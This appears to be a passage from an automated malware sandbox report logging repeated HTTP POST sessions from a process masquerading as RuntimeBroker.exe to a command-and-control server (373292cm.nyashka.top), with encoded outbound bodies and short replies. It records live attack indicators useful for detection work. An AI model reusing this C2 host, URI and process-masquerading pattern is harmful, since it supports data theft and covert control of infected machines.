                                                                                  Data Raw: 09 1d 25 0c 3d 35 0c 5c 32 38 3c 55 24 0a 2e 1d 29 5b 20 03 3e 03 2a 01 27 5e 21 5e 26 10 33 0d 24 15 26 05 2b 58 39 0b 25 06 30 01 2d 24 2b 5d 0c 13 21 04 23 2a 3a 11 31 3f 20 11 29 16 2c 07 36 02 21 01 28 03 21 54 28 06 3b 01 3c 17 09 11 3f 04 2a 1e 2c 01 26 06 2e 1e 29 08 34 14 2b 52 0d 11 24 55 3f 3e 39 54 28 2e 38 01 36 38 30 01 27 13 32 1d 24 32 39 0d 24 07 02 1f 26 0c 3d 51 24 21 07 51 26 05 2e 12 31 3f 26 09 36 18 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: %=5\28<U$.)[ >*'^!^&3$&+X9%0-$+]!#*:1? ),6!(!T(;<?*,&.)4+R$U?>9T(.8680'2$29$&=Q$!Q&.1?&6#T,"W3UV


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  76 | 192.168.2.6 | 57111 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:19.165081024 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:19.520464897 CET | 2544 | OUT | Data Raw: 5f 57 5c 53 54 45 54 5e 5b 5f 5a 51 59 53 58 55 57 50 5d 5e 57 59 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _W\STET^[_ZQYSXUWP]^WYSZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-8'C#-" %)+<-*+=;[7?41?(*< 0;>&F$.Y/5
                                                                                  Jan 11, 2025 06:44:19.797525883 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:19.931071997 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:19 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  77 | 192.168.2.6 | 57112 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:20.055349112 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:20.410913944 CET | 2544 | OUT | Data Raw: 5f 56 5c 5f 54 48 51 5e 5b 5f 5a 51 59 51 58 50 57 5d 5d 5e 57 5d 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _V\_THQ^[_ZQYQXPW]]^W]S\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./#?"-$] ),Y>>!_<> /W#"$<: 3";>&F$.Y/=
                                                                                  Jan 11, 2025 06:44:20.693500042 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:20.824189901 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:20 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  78 | 192.168.2.6 | 57113 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:20.953166962 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:21.306843042 CET | 2536 | OUT | Data Raw: 5a 52 59 52 51 42 51 59 5b 5f 5a 51 59 57 58 51 57 50 5d 58 57 5e 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZRYRQBQY[_ZQYWXQWP]XW^ST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.X;00#>( +-+>](=[ '7W8P*9 7 8&F$.Y/=
                                                                                  Jan 11, 2025 06:44:21.581645966 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:21.710410118 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:21 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  79 | 192.168.2.6 | 57114 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:21.839039087 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:22.192125082 CET | 2544 | OUT | Data Raw: 5a 51 5c 57 54 49 51 59 5b 5f 5a 51 59 5f 58 5f 57 51 5d 5f 57 5d 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZQ\WTIQY[_ZQY_X_WQ]_W]SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.;">;40==\+>\?>7\"/<#,?*<439\..&F$.Y/
                                                                                  Jan 11, 2025 06:44:22.496242046 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:22.668924093 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:22 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  80 | 192.168.2.6 | 57115 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:22.788189888 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:23.145566940 CET | 2544 | OUT | Data Raw: 5f 55 5c 56 54 49 54 5c 5b 5f 5a 51 59 52 58 57 57 5a 5d 5c 57 58 53 58 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _U\VTIT\[_ZQYRXWWZ]\WXSX\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-80$5=?4*)[(^<X!_(-47?3 10+?" _,&F$.Y/1
                                                                                  Jan 11, 2025 06:44:23.417514086 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:23.550510883 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:23 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  81 | 192.168.2.6 | 57116 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:23.683778048 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2536
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:24.038718939 CET | 2536 | OUT | Data Raw: 5a 55 5c 5e 54 42 54 5b 5b 5f 5a 51 59 57 58 5f 57 5f 5d 52 57 5c 53 59 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: ZU\^TBT[[_ZQYWX_W_]RW\SY\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-; 6.#"0!X*=3<?=# !!V<(#,&F$.Y/
                                                                                  Jan 11, 2025 06:44:24.315583944 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:24.442516088 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:24 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  82 | 192.168.2.6 | 57117 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:24.571412086 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  83 | 192.168.2.6 | 57118 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:24.839361906 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 1852
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:25.192234039 CET | 1852 | OUT | Data Raw: 5f 50 59 57 54 47 54 5c 5b 5f 5a 51 59 52 58 52 57 5f 5d 59 57 5c 53 5a 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _PYWTGT\[_ZQYRXRW_]YW\SZ\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S-,3(5<# =)=(X<=)\(#"?? 13+)# 0!8&F$.Y/1
                                                                                  Jan 11, 2025 06:44:25.487061024 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:25.618439913 CET | 308 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 152
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 09 1d 25 0e 29 1b 0f 04 26 5d 2f 09 24 33 3a 54 2a 13 2b 5f 2a 3d 32 00 33 3b 3d 15 32 2d 20 54 24 3b 07 58 3f 58 25 08 26 3f 2b 1e 39 34 2b 5d 0c 13 21 06 23 5c 39 05 25 02 28 10 2a 16 0d 16 35 2c 22 59 3f 39 32 08 3e 2c 38 5a 3c 00 24 05 2b 39 36 56 2f 28 29 17 39 09 32 1e 20 04 2b 52 0d 11 24 53 2b 3e 3d 53 2a 10 30 04 36 28 27 5b 27 3d 08 13 26 1c 32 56 27 3a 3c 11 25 0b 21 51 27 0f 29 55 26 3b 31 07 32 01 08 0c 36 32 23 54 2c 00 22 57 01 33 55 56
                                                                                  Data Ascii: %)&]/$3:T*+_*=23;=2- T$;X?X%&?+94+]!#\9%(*5,"Y?92>,8Z<$+96V/()92 +R$S+>=S*06('['=&2V':<%!Q')U&;1262#T,"W3UV


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  84 | 192.168.2.6 | 57119 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:24.963880062 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:25.317275047 CET | 2544 | OUT | Data Raw: 5f 51 5c 57 51 42 54 5c 5b 5f 5a 51 59 56 58 57 57 58 5d 5d 57 5b 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _Q\WQBT\[_ZQYVXWWX]]W[ST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S./006>$]##>=+=>?=#Z#,3Q4! +_8 0\..&F$.Y/!
                                                                                  Jan 11, 2025 06:44:25.597065926 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:25.764413118 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:25 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  85 | 192.168.2.6 | 57120 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:25.899003029 CET | 257 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Jan 11, 2025 06:44:26.254726887 CET | 2544 | OUT | Data Raw: 5f 50 5c 51 51 47 54 5d 5b 5f 5a 51 59 55 58 55 57 59 5d 59 57 5f 53 54 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _P\QQGT][_ZQYUXUWY]YW_ST\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.. <#-4)[(+>&+;"?442 *)3 X;&F$.Y/-
                                                                                  Jan 11, 2025 06:44:26.530780077 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:26.659113884 CET | 158 | IN | HTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:26 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                  86 | 192.168.2.6 | 57121 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
                                                                                  Timestamp | Bytes transferred | Direction | Data
                                                                                  Jan 11, 2025 06:44:26.932179928 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
                                                                                  Host: 373292cm.nyashka.top
                                                                                  Content-Length: 2544
                                                                                  Expect: 100-continue
                                                                                  Connection: Keep-Alive
                                                                                  Jan 11, 2025 06:44:27.287386894 CET2544OUTData Raw: 5f 56 5c 53 54 42 54 5a 5b 5f 5a 51 59 56 58 53 57 5b 5d 58 57 58 53 5c 5c 5d 5f 5a 5b 5f 5a 51 5a 5a 52 5b 55 5f 50 5a 5d 5a 59 5c 55 56 54 5f 5f 5b 58 5b 58 5f 50 5d 58 5d 53 58 57 59 55 56 5c 5d 5c 59 55 5b 52 50 47 5a 5a 5d 42 58 5d 5c 56 5b
                                                                                  Data Ascii: _V\STBTZ[_ZQYVXSW[]XWXS\\]_Z[_ZQZZR[U_PZ]ZY\UVT__[X[X_P]X]SXWYUV\]\YU[RPGZZ]BX]\V[TSRYZ[S]UR^_QV^\^RU_[_T\A^ZX\[Z\X]XRXWZZZQ^UCRYPZWXVQY[]ZWZGYZS[[]T^V_Y_G\TQ[QG\]ZX]]VZ^W]^^YUF[YZ_W^S.X;#3A#> ^40)<]?..?=77< "8<_;"#%/&F$.Y/!
                                                                                  Jan 11, 2025 06:44:27.581326008 CET25INHTTP/1.1 100 Continue
                                                                                  Jan 11, 2025 06:44:27.714564085 CET158INHTTP/1.1 200 OK
                                                                                  Server: nginx
                                                                                  Date: Sat, 11 Jan 2025 05:44:27 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Content-Length: 4
                                                                                  Connection: keep-alive
                                                                                  Data Raw: 3b 55 5f 5b
                                                                                  Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
87 | 192.168.2.6 | 57122 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:27.838284016 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:28.192416906 CET | 2544 | OUT | Data Raw / Data Ascii: (encoded request body)
Jan 11, 2025 06:44:28.467413902 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:28.633289099 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
88 | 192.168.2.6 | 57123 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:28.757225037 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2544
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:29.114123106 CET | 2544 | OUT | Data Raw / Data Ascii: (encoded request body)
Jan 11, 2025 06:44:29.390260935 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:29.526284933 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:29 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
89 | 192.168.2.6 | 57124 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:29.712022066 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2536
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:30.067970991 CET | 2536 | OUT | Data Raw / Data Ascii: (encoded request body)
Jan 11, 2025 06:44:30.347610950 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:30.476257086 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:30 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
90 | 192.168.2.6 | 57126 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:30.604166031 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 2536
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:30.957801104 CET | 2536 | OUT | Data Raw / Data Ascii: (encoded request body)
Jan 11, 2025 06:44:31.243086100 CET | 25 | IN | HTTP/1.1 100 Continue
Jan 11, 2025 06:44:31.406116962 CET | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Sat, 11 Jan 2025 05:44:31 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 4
Connection: keep-alive
Data Raw: 3b 55 5f 5b
Data Ascii: ;U_[


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
91 | 192.168.2.6 | 57127 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 06:44:30.636059999 CET | 281 | OUT | POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Host: 373292cm.nyashka.top
Content-Length: 1852
Expect: 100-continue
Connection: Keep-Alive
Jan 11, 2025 06:44:30.989495039 CET | 1852 | OUT | Data Raw / Data Ascii: (encoded request body)
Jan 11, 2025 06:44:31.284127951 CET | 25 | IN | HTTP/1.1 100 Continue


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
92 | 192.168.2.6 | 57128 | 37.44.238.250 | 80 | 6008 | C:\Windows\LiveKernelReports\RuntimeBroker.exe
Timestamp | Bytes transferred | Direction | Data
